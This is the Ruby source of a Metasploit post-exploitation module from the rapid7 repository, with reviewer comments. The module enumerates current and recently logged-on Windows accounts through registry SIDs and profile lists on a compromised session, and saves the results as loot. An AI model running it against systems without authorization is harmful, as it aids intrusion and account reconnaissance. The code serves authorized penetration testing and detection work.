GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/enum_logged_on_users.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Post module that enumerates Windows user accounts through the registry and
# saves each result table as loot.
#
# Two independent passes, each switched by a datastore option:
# * CURRENT - subkeys of HKU that look like account SIDs, resolved to
#   DOMAIN\user with resolve_sid (Meterpreter sessions only).
# * RECENT  - the SID and profile path of every entry returned by
#   read_profile_list.
#
# NOTE(review): 'SideEffects' is declared empty and, as far as this file shows,
# both passes only read (registry key enumeration, SID lookups). Anyone
# looking for traces of this activity should expect read-side telemetry from
# the session's process rather than artifacts written on the host.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Accounts
  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::UserProfiles

  # Registers the module metadata and the two boolean options CURRENT and
  # RECENT, both required and defaulting to true.
  #
  # @param info [Hash] metadata merged into the defaults via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Logged On User Enumeration (Registry)',
        'Description' => %q{ This module will enumerate current and recently logged on Windows users. },
        'License' => MSF_LICENSE,
        'Author' => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],
        'Platform' => ['win'],
        'SessionTypes' => %w[powershell shell meterpreter],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        },
        # Meterpreter command the module declares it needs; presumably used by
        # resolve_sid, which is defined in a mixin not visible here.
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[stdapi_railgun_api]
          }
        }
      )
    )

    register_options(
      [
        OptBool.new('CURRENT', [true, 'Enumerate currently logged on users', true]),
        OptBool.new('RECENT', [true, 'Enumerate recently logged on users', true])
      ]
    )
  end

  # Prints and stores a table of SID / profile path pairs taken from
  # read_profile_list. Does nothing when the list is blank or the table ends
  # up without rows.
  #
  # Loot is stored as type 'host.users.recent', file name 'recent_users.txt'.
  def list_recently_logged_on_users
    # user_accounts_only: false is handed to the mixin helper unchanged;
    # presumably it keeps non-user profiles in the result - confirm against
    # the helper.
    profiles = read_profile_list(user_accounts_only: false)
    return if profiles.blank?

    table = Rex::Text::Table.new(
      'Header' => 'Recently Logged Users',
      'Indent' => 1,
      'Columns' => ['SID', 'Profile Path']
    )
    profiles.each { |entry| table << [entry['SID'], entry['PROF']] }
    return if table.rows.empty?

    print_line("\n#{table}\n")
    loot_path = store_loot('host.users.recent', 'text/plain', session, table.to_s, 'recent_users.txt', 'Recent Users')
    print_good("Results saved in: #{loot_path}")
  end

  # Prints and stores a table of SID / DOMAIN\user pairs for account hives
  # found under HKU. Returns early on non-Meterpreter sessions, when the key
  # enumeration yields nothing, or when no row survives the filters.
  #
  # Caveat for interpreting the output: a hive under HKU shows that a profile
  # is loaded, which is not necessarily an interactive logon, so this table can
  # be wider than "who is at the console".
  #
  # Loot is stored as type 'host.users.active', file name 'active_users.txt'.
  def list_currently_logged_on_users
    return if session.type != 'meterpreter'

    hive_keys = registry_enumkeys('HKU')
    return unless hive_keys

    table = Rex::Text::Table.new(
      'Header' => 'Current Logged Users',
      'Indent' => 1,
      'Columns' => %w[SID User]
    )

    hive_keys.each do |key|
      # Keep only S-1-5-21-* account SIDs and drop the companion
      # "<SID>_Classes" keys, which would otherwise duplicate each account.
      next unless key.starts_with?('S-1-5-21-') && !key.ends_with?('_Classes')

      account = resolve_sid(key)
      next if account.nil?

      domain = account[:domain]
      name = account[:name]
      # A SID that resolves without both parts cannot be shown as DOMAIN\user.
      next if domain.blank? || name.blank?

      table << [key, "#{domain}\\#{name}"]
    end
    return if table.rows.empty?

    print_line("\n#{table}\n")
    loot_path = store_loot('host.users.active', 'text/plain', session, table.to_s, 'active_users.txt', 'Active Users')
    print_good("Results saved in: #{loot_path}")
  end

  # Entry point: reports the target host, then runs the passes selected by the
  # CURRENT and RECENT options. CURRENT is refused with an error message on
  # any session type other than 'meterpreter'.
  def run
    # Sessions without sysinfo fall back to running the hostname command.
    hostname = if sysinfo.nil?
                 cmd_exec('hostname')
               else
                 sysinfo['Computer']
               end
    print_status("Running module against #{hostname} (#{session.session_host})")

    if datastore['CURRENT']
      if session.type != 'meterpreter'
        print_error("Incompatible session type '#{session.type}'. Can not retrieve list of currently logged in users.")
      else
        list_currently_logged_on_users
      end
    end

    list_recently_logged_on_users if datastore['RECENT']
  end
end